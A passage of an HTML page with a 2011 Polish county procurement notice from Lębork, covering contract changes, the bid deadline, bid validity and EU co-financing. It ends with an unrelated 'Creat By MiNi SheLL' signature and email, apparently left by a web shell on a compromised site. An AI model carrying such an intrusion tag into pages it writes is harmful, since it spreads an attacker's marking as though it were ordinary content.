Wszelkie zmiany postanowień niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.
Wykonawca jest zobowiązany pisemnie poinformować o zmianie, o której mowa powyżej i uzyskać zgodę Zamawiającego na jej wprowadzenie. W przypadku zaistnienia ww. okoliczności termin zostanie przedłużony o czas niezbędny do zrealizowania zamówienia, co zostanie ustalone za porozumieniem obu stron umowy w oparciu o możliwości wynikające z wniosku o dofinansowanie realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lęborku, ul. Czołgistów 5, 84-300 Lębork pok. nr. 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2011 godzina 13:00, miejsce: Biuro Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn. Kształcenie ustawiczne przepustką do lepszego jutra współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.3 Upowszechnienie formalnego kształcenia ustawicznego w formach szkolnych).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com